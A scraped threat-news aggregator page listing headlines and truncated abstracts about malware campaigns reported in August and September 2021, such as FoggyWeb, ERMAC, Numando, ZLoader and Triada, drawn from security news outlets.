Mirai_ptea_Rimasuta now has a built-in mechanism to check if the running environment is a sandbox. It also encrypts the network traffic to counter the network level detection.Netlab
September 27, 2021
Microsoft Warns of FoggyWeb Malware Targeting Active Directory FS Servers Full Text
Abstract
Microsoft on Monday revealed new malware deployed by the hacking group behind the SolarWinds supply chain attack last December to deliver additional payloads and steal sensitive information from Active Directory Federation Services ( AD FS ) servers. The tech giant's Threat Intelligence Center (MSTIC) codenamed the "passive and highly targeted backdoor" FoggyWeb, making it the threat actor tracked as Nobelium's latest tool in a long list of cyber weaponry such as Sunburst , Sunspot , Raindrop , Teardrop , GoldMax, GoldFinder, Sibot , Flipflop , NativeZone , EnvyScout, BoomBox, and VaporRage . "Once Nobelium obtains credentials and successfully compromises a server, the actor relies on that access to maintain persistence and deepen its infiltration using sophisticated malware and tools," MSTIC researchers said . "Nobelium uses FoggyWeb to remotely exfiltrate the configuration database of compromised AD FS servers, decrypted token-signing cerThe Hacker News
September 27, 2021
New Android Malware Steals Financial Data from 378 Banking and Wallet Apps Full Text
Abstract
The operators behind the BlackRock mobile malware have surfaced back with a new Android banking trojan called ERMAC that targets Poland and has its roots in the infamous Cerberus malware, according to the latest research. "The new trojan already has active distribution campaigns and is targeting 378 banking and wallet apps with overlays," ThreatFabric's CEO Cengiz Han Sahin said in an emailed statement. First campaigns involving ERMAC are believed to have begun in late August under the guise of the Google Chrome app. Since then, the attacks have expanded to include a range of apps such as banking, media players, delivery services, government applications, and antivirus solutions like McAfee . Almost fully based on the notorious banking trojan Cerberus , the Dutch cybersecurity firm's findings come from forum posts made by an actor named DukeEugene last month on August 17, inviting prospective customers to "rent a new android botnet with wide functionalitThe Hacker News
September 27, 2021
Jupyter infostealer continues to evolve and is distributed via MSI installers Full Text
Abstract
Cybersecurity researchers spotted a new version of the Jupyter infostealer which is distributed via MSI installers. Cybersecurity researchers from Morphisec have spotted a new version of the Jupyter infostealer that continues to be highly evasive. In...Security Affairs
September 27, 2021
New malware steals Steam, Epic Games Store, and EA Origin accounts Full Text
Abstract
A new malware sold on dark web forums is being used by threat actors to steal accounts for multiple gaming platforms, including Steam, Epic Games Store, and EA Origin.BleepingComputer
September 26, 2021
A New Jupyter Malware Version is Being Distributed via MSI Installers Full Text
Abstract
Cybersecurity researchers have charted the evolution of Jupyter, a .NET infostealer known for singling out healthcare and education sectors, which make it exceptional at defeating most endpoint security scanning solutions. The new delivery chain, spotted by Morphisec on September 8, underscores that the malware has not just continued to remain active but also showcases "how threat actors continue to develop their attacks to become more efficient and evasive." The Israeli company said it's currently investigating the scale and scope of the attacks. First documented in November 2020, Jupyter (aka Solarmarker) is likely Russian in origin and primarily targets Chromium, Firefox, and Chrome browser data, with additional capabilities that allow for full backdoor functionality, including features to siphon information and upload the details to a remote server and download and execute further payloads. Forensic evidence gathered by Morphisec shows that multiple versions oThe Hacker News
September 26, 2021
ZuRu Malware Exploits Baidu Search Results Full Text
Abstract
Experts reported new Mac ZuRu malware spreading via poisoned search engine results in China via Baidu. The criminals masquerade as iTerm2, an alternative to the default Mac terminal app. The fake app couldn't be flagged even with an extra security badge that Apple usually provides to the notariz ... Read MoreCyware Alerts - Hacker News
September 23, 2021
New ZE Loader Targets Online Banking Users Full Text
Abstract
ZE Loader hides as part of legitimate software by performing a dynamic link library (DLL) hijacking. Using a malicious DLL instead of the original one, it replaces a DLL named DVDSetting.dll.Security Intelligence
September 23, 2021
Malware devs trick Windows validation with malformed certs Full Text
Abstract
Google researchers spotted malware developers creating malformed code signatures seen as valid in Windows to bypass security software.BleepingComputer
September 23, 2021
TinyTurla: New Malware By Russian Turla Full Text
Abstract
The Turla APT group is back with a new backdoor dubbed TinyTurla to gain persistence on targeted systems across Germany, the U.S., and Afghanistan. This malware got the attention of researchers when it targeted Afghanistan before the Taliban's recent takeover of the government. O rganizations are ... Read MoreCyware Alerts - Hacker News
September 23, 2021
Water Basilisk- A Fileless Attack Campaign, a New Malware, and Lots of RATs Full Text
Abstract
Trend Micro researchers stumbled upon a fileless attack campaign that is leveraging a new crypter to propagate Remote Access Trojans (RATs). The RATs include BitRat, NjRat, LimeRat, Warzone, QuasarRat, and Nanocore RAT. The campaign was the most active in August.Cyware Alerts - Hacker News
September 23, 2021
Fake WhatsApp backup message delivers malware to Spanish speakers’ devices Full Text
Abstract
Spanish authorities are warning of a phishing campaign that impersonates messaging service WhatsApp in an attempt to trick recipients into downloading the NoPiques trojan.The Daily Swig
September 22, 2021
Malicious PowerPoint Documents Used to Distribute AgentTesla RAT Full Text
Abstract
McAfee Labs have observed a new phishing campaign that utilizes macro capabilities available in Microsoft PowerPoint. In this campaign, the spam email comes with a PowerPoint file as an attachment.McAfee
September 21, 2021
TinyTurla - Turla deploys new malware to keep a secret backdoor on victim machines Full Text
Abstract
Cisco Talos researchers recently discovered a new backdoor used by the Russian Turla APT group. They observed infections in the U.S., Germany, and, more recently, in Afghanistan.Cisco Talos
September 21, 2021
New Banking Trojan Abuses Public Platforms Including YouTube Full Text
Abstract
ESET reported a new Numando banking Trojan that abuses YouTube, Pastebin, and other public platforms to fool victims into stealing their financial credentials. It can simulate mouse clicks, keyboard actions, hijack PC’s shutdown/restart functions, kill browser processes, and take screenshots. Banki ... Read MoreCyware Alerts - Hacker News
September 21, 2021
Capoae Uses Known Tricks to Target Linux and Windows Full Text
Abstract
New Capoae malware strain is reportedly targeting WordPress and Linux systems worldwide. Written in GoLang, it exploited around four different RCE vulnerabilities. Moreover, the malware contains a port scanner to find open ports and services for further exploitation. Among other advice, experts r ... Read MoreCyware Alerts - Hacker News
September 21, 2021
New Capoae Malware Infiltrates WordPress Sites and Installs Backdoored Plugin Full Text
Abstract
A recently discovered wave of malware attacks has been spotted using a variety of tactics to enslave susceptible machines with easy-to-guess administrative credentials to co-opt them into a network with the goal of illegally mining cryptocurrency. "The malware's primary tactic is to spread by taking advantage of vulnerable systems and weak administrative credentials. Once they've been infected, these systems are then used to mine cryptocurrency," Akamai security researcher Larry Cashdollar said in a write-up published last week. The PHP malware — codenamed "Capoae" (short for "Сканирование," the Russian word for "Scanning") — is said to be delivered to the hosts via a backdoored addition to a WordPress plugin called "download-monitor," which gets installed after successfully brute-forcing WordPress admin credentials. The attacks also involve the deployment of a Golang binary with decryption functionality, with the obfuscThe Hacker News
September 19, 2021
Numando, a new banking Trojan that abuses YouTube for remote configuration Full Text
Abstract
Numando, a new banking Trojan that abuses YouTube, Pastebin, and other public platforms as C2 infrastructure and to spread. ESET researchers spotted a new LATAM banking trojan, tracked as Numando, that abuses YouTube, Pastebin, and other public platforms...Security Affairs
September 19, 2021
Numando: A New Banking Trojan Targeting Latin American Users Full Text
Abstract
A newly spotted banking trojan has been caught leveraging legitimate platforms like YouTube and Pastebin to store its encrypted, remote configuration and commandeer infected Windows systems, making it the latest to join the long list of malware targeting Latin America (LATAM) after Guildma, Javali, Melcoz, Grandoreiro, Mekotio, Casbaneiro, Amavaldo, Vadokrist, and Janeleiro. The threat actor behind this malware family — dubbed " Numando " — is believed to have been active since at least 2018. "[Numando brings] interesting new techniques to the pool of Latin American banking trojans' tricks, like using seemingly useless ZIP archives or bundling payloads with decoy BMP images," ESET researchers said in a technical analysis published on Friday. "Geographically, it focuses almost exclusively on Brazil with rare campaigns in Mexico and Spain." Written in Delphi, the malware comes with an array of backdoor capabilities that allow it to control comprThe Hacker News
September 18, 2021
Yes, of course there’s now malware for Windows Subsystem for Linux Full Text
Abstract
Linux binaries have been found trying to take over Windows systems in what appears to be the first publicly identified malware to utilize Microsoft's Windows Subsystem for Linux (WSL) to install unwelcome payloads.The Register
September 17, 2021
New Malware Targets Windows Subsystem for Linux to Evade Detection Full Text
Abstract
A number of malicious samples have been created for the Windows Subsystem for Linux (WSL) with the goal of compromising Windows machines, highlighting a sneaky method that allows the operators to stay under the radar and thwart detection by popular anti-malware engines. The "distinct tradecraft" marks the first instance where a threat actor has been found abusing WSL to install subsequent payloads. "These files acted as loaders running a payload that was either embedded within the sample or retrieved from a remote server and was then injected into a running process using Windows API calls," researchers from Lumen Black Lotus Labs said in a report published on Thursday. Windows Subsystem for Linux, launched in August 2016, is a compatibility layer that's designed to run Linux binary executables (in ELF format) natively on the Windows platform without the overhead of a traditional virtual machine or dual-boot setup. The earliest artifacts date back to MThe Hacker News
September 17, 2021
A new Win malware uses Windows Subsystem for Linux (WSL) to evade detection Full Text
Abstract
Security researchers spotted a new malware that uses Windows Subsystem for Linux (WSL) to evade detection in attacks against Windows machines. Security researchers from Lumen’s Black Lotus Labs have discovered several malicious Linux binaries developed...Security Affairs
September 16, 2021
New malware uses Windows Subsystem for Linux for stealthy attacks Full Text
Abstract
Security researchers have discovered malicious Linux binaries created for the Windows Subsystem for Linux (WSL), indicating that hackers are trying out new methods to compromise Windows machines.BleepingComputer
September 16, 2021
Capoae Malware Ramps Up: Uses Multiple Vulnerabilities and Tactics to Spread Full Text
Abstract
The malware’s primary tactic is to spread by taking advantage of vulnerable systems and weak administrative credentials. Once they’ve been infected, these systems are then used to mine cryptocurrency.Akamai
September 16, 2021
Novel Malware Samples Trying to Hack Windows from its Linux Subsystem Full Text
Abstract
Security researchers at Lumen’s Black Lotus Labs have found a series of malware samples that were configured to infect the Windows Subsystem for Linux and then pivot to its native Windows environment.The Record
September 14, 2021
New Stealthier ZLoader Variant Spreading Via Fake TeamViewer Download Ads Full Text
Abstract
Users searching for TeamViewer remote desktop software on search engines like Google are being redirected to malicious links that drop ZLoader malware onto their systems while simultaneously embracing a stealthier infection chain that allows it to linger on infected devices and evade detection by security solutions. "The malware is downloaded from a Google advertisement published through Google Adwords," researchers from SentinelOne said in a report published on Monday. "In this campaign, the attackers use an indirect way to compromise victims instead of using the classic approach of compromising the victims directly, such as by phishing." First discovered in 2016, ZLoader (aka Silent Night and ZBot) is a fully-featured banking trojan and a fork of another banking malware called ZeuS, with newer versions implementing a VNC module that grants adversaries remote access to victim systems. The malware is in active development, with criminal actors spawning anThe Hacker News
September 14, 2021
ZLoader’s Back, Abusing Google AdWords, Disabling Windows Defender Full Text
Abstract
The well-known banking trojan retools for stealth with a whole new attack routine, including using ads for Microsoft TeamViewer and Zoom to lure victims in.Threatpost
September 14, 2021
Vermilion Strike, a Linux implementation of Cobalt Strike Beacon used in attacks Full Text
Abstract
Researchers discovered Linux and Windows implementations of the Cobalt Strike Beacon developed by attackers that were actively used in attacks in the wild. Threat actors re-implemented from scratch unofficial Linux and Windows versions of the Cobalt...Security Affairs
September 13, 2021
Linux Implementation of Cobalt Strike Beacon Targeting Organizations Worldwide Full Text
Abstract
Researchers on Monday took the wraps off a newly discovered Linux and Windows re-implementation of Cobalt Strike Beacon that's actively set its sights on government, telecommunications, information technology, and financial institutions in the wild. The as-yet undetected version of the penetration testing tool — codenamed "Vermilion Strike" — marks one of the rare Linux ports , which has been traditionally a Windows-based red team tool heavily repurposed by adversaries to mount an array of targeted attacks. Cobalt Strike bills itself as a " threat emulation software ," with Beacon being the payload engineered to model an advanced actor and duplicate their post-exploitation actions. "The stealthy sample uses Cobalt Strike's command-and-control (C2) protocol when communicating to the C2 server and has remote access capabilities such as uploading files, running shell commands and writing to files," Intezer researchers said in a report publisheThe Hacker News
September 13, 2021
The new maxtrilha trojan is being disseminated and targeting several banks Full Text
Abstract
A new banking trojan dubbed maxtrilha (due to its encryption key) has been discovered in the last few days and targeting customers of European and South American banks. The new maxtrilha trojan is being disseminated and targeting several...Security Affairs
September 11, 2021
New SOVA Android Banking trojan is rapidly growing Full Text
Abstract
SOVA is a new Android banking trojan that targets banking applications, cryptocurrency wallets, and shopping apps from the U.S. and Spain. Researchers from cybersecurity firm ThreatFabric have spotted in the beginning of August a new Android banking...Security Affairs
September 11, 2021
New Dridex Variant Being Spread By Crafted Excel Document Full Text
Abstract
Dridex is a Trojan malware, also known as Bugat or Cridex, which is capable of stealing sensitive information from infected machines and delivering and executing malicious modules (dll).Fortinet
September 10, 2021
SOVA: New Android Banking Trojan Emerges With Growing Capabilities Full Text
Abstract
A mix of banking applications, cryptocurrency wallets, and shopping apps from the U.S. and Spain are the target of a newly discovered Android trojan that could enable attackers to siphon personally identifiable information from infected devices, including banking credentials and open the door for on-device fraud. Dubbed S.O.V.A. (referring to the Russian word for owl), the current version of the banking malware comes with myriad features to steal credentials and session cookies through web overlay attacks, log keystrokes, hide notifications, and manipulate the clipboard to insert modified cryptocurrency wallet addresses, with future plans to incorporate on-device fraud through VNC , carry out DDoS attacks, deploy ransomware, and even intercept two-factor authentication codes. The malware was discovered in the beginning of August 2021 by researchers from Amsterdam-based cybersecurity firm ThreatFabric. Overlay attacks typically involve the theft of confidential user information usThe Hacker News
September 10, 2021
Experts Link Sidewalk Malware Attacks to Grayfly Chinese Hacker Group Full Text
Abstract
A previously undocumented backdoor that was recently found targeting an unnamed computer retail company based in the U.S. has been linked to a longstanding Chinese espionage operation dubbed Grayfly. In late August, Slovakian cybersecurity firm ESET disclosed details of an implant called SideWalk, which is designed to load arbitrary plugins sent from an attacker-controlled server, gather information about running processes in the compromised systems, and transmit the results back to the remote server. The cybersecurity firm attributed the intrusion to a group it tracks as SparklingGoblin, an adversary believed to be connected to the Winnti (aka APT41) malware family. But latest research published by researchers from Broadcom's Symantec has pinned the SideWalk backdoor on the China-linked espionage group, pointing out the malware's overlaps with the older Crosswalk malware, with the latest Grayfly hacking activities singling out a number of organizations in Mexico, TaiwanThe Hacker News
September 06, 2021
Traffic Exchange Networks Distributing Malware Disguised as Cracked Software Full Text
Abstract
An ongoing campaign has been found to leverage a network of websites acting as a "dropper as a service" to deliver a bundle of malware payloads to victims looking for "cracked" versions of popular business and consumer applications. "These malware included an assortment of click fraud bots, other information stealers, and even ransomware," researchers from cybersecurity firm Sophos said in a report published last week. The attacks work by taking advantage of a number of bait pages hosted on WordPress that contain "download" links to software packages, which, when clicked, redirect the victims to a different website that delivers potentially unwanted browser plug-ins and malware, such as installers for Raccoon Stealer , Stop ransomware, the Glupteba backdoor, and a variety of malicious cryptocurrency miners that masquerade as antivirus solutions. "Visitors who arrive on these sites are prompted to allow notifications; If they allow thThe Hacker News
September 6, 2021
Malware found pre-installed in cheap push-button mobile phones sold in Russia Full Text
Abstract
Security researcher ValdikSS found malware preinstalled in four low-budget push-button mobile phones available for sale on Russian e-stores. A Russian security researcher that goes online with the name of ValdikSS has found malware preinstalled in four...Security Affairs
September 5, 2021
This GPU-Based Malware Attack can Dodge Usual Security Checks Full Text
Abstract
A post was spotted on a hacker forum where someone advertised a PoC for hiding and executing malicious codes from the GPU. The seller who advertised the recent PoC has denied any possible connection with the JellyFish malware. Vendors of GPUs should be taking note of it and start preparing for coun ... Read MoreCyware Alerts - Hacker News
September 04, 2021
Watch out for new malware campaign’s ‘Windows 11 Alpha’ attachment Full Text
Abstract
Relying on a simple recipe that has proved successful time and time again, threat actors have deployed a malware campaign recently that used a Windows 11 theme to lure recipients into activating malicious code placed inside Microsoft Word documents.BleepingComputer
September 03, 2021
This New Malware Family Using CLFS Log Files to Avoid Detection Full Text
Abstract
Cybersecurity researchers have disclosed details about a new malware family that relies on the Common Log File System ( CLFS ) to hide a second-stage payload in registry transaction files in an attempt to evade detection mechanisms. FireEye's Mandiant Advanced Practices team, which made the discovery, dubbed the malware PRIVATELOG , and its installer, STASHLOG . Specifics about the identities of the threat actor or their motives remain unclear. Although the malware is yet to be detected in real-world attacks aimed at customer environments or be spotted launching any second-stage payloads, Mandiant suspects that PRIVATELOG could still be in development, the work of a researcher, or deployed as part of a highly targeted activity. CLFS is a general-purpose logging subsystem in Windows that's accessible to both kernel-mode as well as user-mode applications such as database systems, OLTP systems, messaging clients, and network event management systems for building and sharing hThe Hacker News
September 3, 2021
PRIVATELOG, a new malware that leverages Common Log File System (CLFS) to avoid detection Full Text
Abstract
Mandiant researchers spotted a new malware family, dubbed PRIVATELOG, that relies on the Common Log File System (CLFS) to evade detection solutions. FireEye's Mandiant cybersecurity researchers spotted a new malware family, named PRIVATELOG, that...Security Affairs
August 31, 2021
Joker Malware is Back - Yet Again! Full Text
Abstract
The Belgian Police issued a warning about the return of the Joker virus that is attacking Android devices - once more. The virus has been detected in eight apps in the Google Play Store; however, the apps have been removed by Google.Cyware Alerts - Hacker News
August 31, 2021
Evil WhatsApp Mod Spotted Infecting Android Users with Malware Full Text
Abstract
A version of FMWhatsApp, a popular WhatsApp mod, was found to carry a trojan. Dubbed Triada, the trojan downloads malicious apps on victims’ devices and is found in version 16.80.0 of FMWhatsApp.Cyware Alerts - Hacker News
August 30, 2021
Konni RAT Targets Russian Users Full Text
Abstract
In late July, an ongoing spear-phishing campaign was discovered abusing two Russian language documents, which were laced with the same malicious macro to deliver Konni RAT.Cyware Alerts - Hacker News
August 29, 2021
FIN8 Returns with New Sardonic Backdoor Full Text
Abstract
Financially motivated FIN8 group attempted to compromise the networks of a U.S. financial organization using a new malware - Sardonic. Sardonic can establish persistence on the infected machine and collects system info, executes arbitrary commands, loads/executes extra plugins, and the results are ... Read MoreCyware Alerts - Hacker News
August 26, 2021
Pysa is Using Keyword-based Scripts to Target Data Full Text
Abstract
A PowerShell script has disclosed details about different types of data that are stolen by the Pysa ransomware group. It has a list of 123 keywords. Some of the keywords are aimed at stealing data from folders related to investigations, crime, fraud, federal, hidden, bureau, illegal, terror, and se ... Read MoreCyware Alerts - Hacker News
August 25, 2021
RiskIQ Analysis Links EITest and Gootloader Campaigns, Once Thought to Be Disparate Full Text
Abstract
EITest was first identified in 2014 and historically used large numbers of compromised WordPress sites and social engineering techniques to trick users into downloading malware.Risk IQ
August 25, 2021
Attackers Drop Commodity RATs to Target Latin Americans Full Text
Abstract
A set of malware campaigns have been discovered spreading commodity RATs and using a .NET-based crypter service 3losh to target travel and hospitality businesses in Latin America. These campaigns use either compromised or attacker-controlled websites to host their tools and payloads. Furthermore, ... Read MoreCyware Alerts - Hacker News
August 25, 2021
New SideWalk Backdoor Targets U.S.-based Computer Retail Business Full Text
Abstract
A computer retail company based in the U.S. was the target of a previously undiscovered implant called SideWalk as part of a recent campaign undertaken by a Chinese advanced persistent threat group primarily known for singling out entities in East and Southeast Asia. Slovak cybersecurity firm ESET attributed the malware to an advanced persistent threat it tracks under the moniker SparklingGoblin, an adversary believed to be connected to the Winnti umbrella group, noting its similarities to another backdoor dubbed Crosswalk that was put to use by the same threat actor in 2019. "SideWalk is a modular backdoor that can dynamically load additional modules sent from its C&C [command-and-control] server, makes use of Google Docs as a dead drop resolver , and Cloudflare workers as a C&C server," ESET researchers Thibaut Passilly and Mathieu Tartare said in a report published Tuesday. "It can also properly handle communication behind a proxy." Since firThe Hacker News
August 25, 2021
Modified version of Android WhatsApp installs Triada Trojan Full Text
Abstract
Experts spotted a modified version of WhatsApp for Android, which offers extra features, but that installs the Triada Trojan on the devices. Researchers from Kaspersky spotted a modified version of WhatsApp for Android, which offers extra features,...Security Affairs
August 25, 2021
The ‘Joker’ Virus Has Returned to Android Apps in the Google Play Store Full Text
Abstract
"This malicious program has been detected in eight Play Store applications that Google has suppressed," say the Belgian authorities in a statement published this Friday on their website.Entrepreneur
August 24, 2021
Custom WhatsApp Build Delivers Triada Malware Full Text
Abstract
Researchers have spotted the latest version of the Triada trojan targeting mobile devices via an advertising SDK.Threatpost
August 24, 2021
Modified Version of WhatsApp for Android Spotted Installing Triada Trojan Full Text
Abstract
A modified version of the WhatsApp messaging app for Android has been trojanized to serve malicious payloads, display full-screen ads, and sign up device owners for unwanted premium subscriptions without their knowledge. "The Trojan Triada snuck into one of these modified versions of the messenger called FMWhatsApp 16.80.0 together with the advertising software development kit (SDK)," researchers from Russian cybersecurity firm Kaspersky said in a technical write-up published Tuesday. "This is similar to what happened with APKPure , where the only malicious code that was embedded in the app was a payload downloader." Modified versions of legitimate Android apps — aka Modding — are designed to perform functions not originally conceived or intended by the app developers, and FMWhatsApp allows users to customize the app with different themes, personalize icons, and hide features like last seen, and even deactivate video calling features. The tampered variant ofThe Hacker News
August 24, 2021
Malicious WhatsApp mod infects Android devices with malware Full Text
Abstract
A malicious version of the FMWhatsappWhatsApp mod delivers a Triadatrojan payload, a nasty surprise that infects their devices with additional malware, including the very hard-to-remove xHelper trojan.BleepingComputer
August 20, 2021
ShadowPad Malware is Becoming a Favorite Choice of Chinese Espionage Groups Full Text
Abstract
ShadowPad, an infamous Windows backdoor that allows attackers to download further malicious modules or steal data, has been put to use by five different Chinese threat clusters since 2017. "The adoption of ShadowPad significantly reduces the costs of development and maintenance for threat actors," SentinelOne researchers Yi-Jhen Hsieh and Joey Chen said in a detailed overview of the malware, adding "some threat groups stopped developing their own backdoors after they gained access to ShadowPad." The American cybersecurity firm dubbed ShadowPad a "masterpiece of privately sold malware in Chinese espionage." A successor to PlugX and a modular malware platform since 2015, ShadowPad catapulted to widespread attention in the wake of supply chain incidents targeting NetSarang , CCleaner , and ASUS , leading the operators to shift tactics and update their defensive measures with advanced anti-detection and persistence techniques. More recently, attaThe Hacker News
August 20, 2021
After Europe, Flubot Malware Campaign Hits Australians via Scam Text Messages Full Text
Abstract
FluBot is a type of malware targeting Android users, but iPhone users can also receive messages. It tells the receiver they missed a call or have a new voicemail, providing a fake link to listen.The Guardian
August 19, 2021
FluBot Malware is on the Fly Again with New Overlay Attacks Full Text
Abstract
FluBot was found targeting finance apps belonging to Polish and German banks by impersonating the app's login form in a new overlay attack. Earlier, in the month of June, this malware was seen imitating postal and logistic service apps to lure its victims. While smartphone users must restrict ... Read MoreCyware Alerts - Hacker News
August 19, 2021
How Diavol and TrickBot are Connected? Full Text
Abstract
IBM X-Force Threat Intelligence studied different versions of the Diavol ransomware whose code configuration hinted at a possible link to the TrickBot group. TrickBot has been observed using group and campaign IDs, which are used by Diavol as well. Experts say, sharing threat intelligence between o ... Read MoreCyware Alerts - Hacker News
August 18, 2021
Houdini malware returns, enterprise risk assessment compromised by Amazon Sidewalk Full Text
Abstract
The research suggests that device identity spoofing threatens to become far more prevalent. Houdini is a well-known remote access trojan (RAT), but the research shows this particular use is novel.Help Net Security
August 18, 2021
NK Hackers Deploy Browser Exploits on South Korean Sites to Spread Malware Full Text
Abstract
A North Korean threat actor has been discovered taking advantage of two exploits in Internet Explorer to infect victims with a custom implant as part of a strategic web compromise (SWC) targeting a South Korean online newspaper. Cybersecurity firm Volexity attributed the attacks to a threat actor it tracks as InkySquid, and more widely known by the monikers ScarCruft and APT37. Daily NK, the publication in question, is said to have hosted the malicious code from at least late March 2021 until early June 2021. The "clever disguise of exploit code amongst legitimate code" and the use of custom malware enables the attackers to avoid detection, Volexity researchers said. The attacks involved tampering with the jQuery JavaScript libraries hosted on the website to serve additional obfuscated JavaScript code from a remote URL, using it to leverage exploits for two Internet Explorer flaws that were patched by Microsoft in August 2020 and March 2021 . Successful exploitationThe Hacker News
August 17, 2021
Apple: CSAM Image-Detection Backdoor ‘Narrow’ in Scope Full Text
Abstract
Computing giant tries to reassure users that the tool won’t be used for mass surveillance.Threatpost
August 17, 2021
Resurgent FluBot malware targets German and Polish banks Full Text
Abstract
Netcraft’s research into the FluBot malware confirms that its operations are expanding rapidly, with a spike in the number of malware distribution pages deployed and finance apps affected.kkhacklabs
August 17, 2021
Neurevt Trojan Updated with Backdoor and Information Stealing Capabilities to Target Mexican Organizations Full Text
Abstract
This trojan appears to target Mexican organizations. Cisco Talos is tracking these campaigns embedding URLs in the associated droppers, which belong to many major banks in Mexico.Cisco Talos
August 17, 2021
Malicious Ads Target Cryptocurrency Users With Cinobi Banking Trojan Full Text
Abstract
A new social engineering-based malvertising campaign targeting Japan has been found to deliver a malicious application that deploys a banking trojan on compromised Windows machines to steal credentials associated with cryptocurrency accounts. The application masquerades as an animated porn game, a reward points application, or a video streaming application, Trend Micro researchers Jaromir Horejsi and Joseph C Chen said in an analysis published last week, attributing the operation to a threat actor it tracks as Water Kappa, which was previously found targeting Japanese online banking users with the Cinobi trojan by leveraging exploits in Internet Explorer browser. The switch in tactics is an indicator that the adversary is singling out users of web browsers other than Internet Explorer, the researchers added. Water Kappa's latest infection routine commences with malvertisements for either Japanese animated porn games, reward points apps, or video streaming services, with tThe Hacker News
August 16, 2021
Malware dev infects own PC and data ends up on intel platform Full Text
Abstract
A malware developer unleashed their creation on their system to try out new features and the data ended up on a cybercrime intelligence platform, exposing a glimpse of the cybercriminal endeavor.BleepingComputer
August 16, 2021
New AdLoad Variant Bypasses Apple’s Security Defenses to Target macOS Systems Full Text
Abstract
A new wave of attacks involving a notorious macOS adware family has evolved to leverage around 150 unique samples in the wild in 2021 alone, some of which have slipped past Apple's on-device malware scanner and even signed by its own notarization service, highlighting the malicious software ongoing attempts to adapt and evade detection. "AdLoad," as the malware is known, is one of several widespread adware and bundleware loaders targeting macOS since at least 2017. It's capable of backdooring an affected system to download and install adware or potentially unwanted programs (PUPs), as well as amass and transmit information about victim machines. The new iteration "continues to impact Mac users who rely solely on Apple's built-in security control XProtect for malware detection," SentinelOne threat researcher Phil Stokes said in an analysis published last week. "As of today, however, XProtect arguably has around 11 different signatures for AdLoaThe Hacker News
August 14, 2021
Malicious Docker Images Used to Mine Monero Full Text
Abstract
A recently uncovered cryptomining scheme used malicious Docker images to hijack organizations’ computing resources to mine cryptocurrency, according to cybersecurity firm Aqua Security.Info Risk Today
August 13, 2021
New InfoStealer Malware Spread Via Russian Underground Forum Full Text
Abstract
Researchers uncovered a new info-stealer malware “Ficker” and is distributed via a Russian underground forum by threat actors as Malware-as-a-Service (MaaS) model to attack Windows users.GB Hackers
August 13, 2021
Updated AdLoad Malware Capable of Bypassing Apple’s Defenses Full Text
Abstract
SentinelOne warned against a new AdLoad malware variant that bypasses Apple's YARA signature-based XProtect built-in antivirus tech to infect macOS. Hundreds of unique samples of AdLoad adware were found circulating in the wild that remained undetected for almost ten months. Researchers emphasize t ... Read MoreCyware Alerts - Hacker News
August 13, 2021
eCh0raix Combo: Targeting Both QNAP and Synology Full Text
Abstract
Palo Alto disclosed that a new eCh0raix variant is now capable of encrypting both QNAP and Synology Network-Attached Storage (NAS) devices. Therefore, researchers recommend updating device firmware as the first step of defense. Also, it is recommended to create complex passwords and limit connectio ... Read MoreCyware Alerts - Hacker News
August 13, 2021
Chaos: Ransomware or Wiper? Full Text
Abstract
A new malware named Chaos has been discovered on an underground forum claiming to be a ransomware but, an analysis by researchers suggests it is a wiper under development. It has been in development since June and could become a serious and dangerous threat for organizations in near future.Cyware Alerts - Hacker News
August 12, 2021
Signed MSI files, Raccoon and Amadey are used for installing ServHelper RAT Full Text
Abstract
Although ServHelper has existed since at least early 2019, we detected the use of other malware families to install it. The installation comes as a GoLang dropper, .NET dropper, or PowerShell script.Cisco Talos
August 12, 2021
July 2021’s Most Wanted Malware: Snake Keylogger Enters Top 10 for First Time - Check Point Software Full Text
Abstract
Check Point Research reports that Trickbot is the most prevalent malware for the third month running, while Snake Keylogger enters the index for the first time taking second place.Check Point Research
August 12, 2021
AdLoad Malware 2021 Samples Skate Past Apple XProtect Full Text
Abstract
A crush of new attacks using the well-known adware involves at least 150 updated samples, many of which aren’t recognized by Apple’s built-in security controls.Threatpost
August 12, 2021
Experts Shed Light On New Russian Malware-as-a-Service Written in Rust Full Text
Abstract
A nascent information-stealing malware sold and distributed on underground Russian underground forums has been written in Rust, signalling a new trend where threat actors are increasingly adopting exotic programming languages to bypass security protections, evade analysis, and hamper reverse engineering efforts. Dubbed " Ficker Stealer ," it's notable for being propagated via Trojanized web links and compromised websites, luring in victims to scam landing pages purportedly offering free downloads of legitimate paid services like Spotify Music, YouTube Premium, and other Microsoft Store applications. "Ficker is sold and distributed as Malware-as-a-Service (MaaS), via underground Russian online forums," BlackBerry's research and intelligence team said in a report published today. "Its creator, whose alias is @ficker, offers several paid packages, with different levels of subscription fees to use their malicious program." First seen in the wiThe Hacker News
August 11, 2021
New AdLoad malware variant slips through Apple’s XProtect defenses Full Text
Abstract
A new AdLoad malware variant is slipping through Apple's YARA signature-based XProtect built-in antivirus tech to infect Macs.BleepingComputer
August 09, 2021
FlyTrap malware hijacks thousands of Facebook accounts Full Text
Abstract
A new Android threat that researchers call FlyTrap has been hijacking Facebook accounts of users in more than 140 countries by stealing session cookies.BleepingComputer
August 09, 2021
Beware! New Android Malware Hacks Thousands of Facebook Accounts Full Text
Abstract
A new Android trojan has been found to compromise Facebook accounts of over 10,000 users in at least 144 countries since March 2021 via fraudulent apps distributed through Google Play Store and other third-party app marketplaces. Dubbed " FlyTrap ," the previously undocumented malware is believed to be part of a family of trojans that employ social engineering tricks to breach Facebook accounts as part of a session hijacking campaign orchestrated by malicious actors operating out of Vietnam, according to a report published by Zimperium's zLabs today and shared with The Hacker News. Although the offending nine applications have since been pulled from Google Play, they continue to be available in third-party app stores, "highlighting the risk of sideloaded applications to mobile endpoints and user data," Zimperium malware researcher Aazim Yaswant said. The list of apps is as follows - GG Voucher (com.luxcarad.cardid) Vote European Football (com.gardenguThe Hacker News
August 09, 2021
Synology warns of malware infecting NAS devices with ransomware Full Text
Abstract
Taiwan-based NAS maker Synology has warned customers that the StealthWorker botnet is targeting their network-attached storage devices in ongoing brute-force attacks.BleepingComputer
August 8, 2021
FatalRAT: Another Trojan Exploiting Telegram Full Text
Abstract
Telegram channels have become quite the hot seat for threat actors. Lately, a new Remote Access Trojan (RAT) has entered the landscape, propagating via Telegram channels.Cyware Alerts - Hacker News
August 5, 2021
Black Hat: Charming Kitten Leaves More Paw Prints Full Text
Abstract
IBM X-Force detailed the custom-made “LittleLooter” data stealer and 4+ hours of ITG18 operator training videos revealed by an opsec goof.Threatpost
August 5, 2021
Examining Unique Magento Backdoors Full Text
Abstract
These backdoors are intentionally hidden from public view, rendering any remote or external scanners futile, and the dynamic nature of these backdoors makes signature-based detection less reliable.Sucuri
August 04, 2021
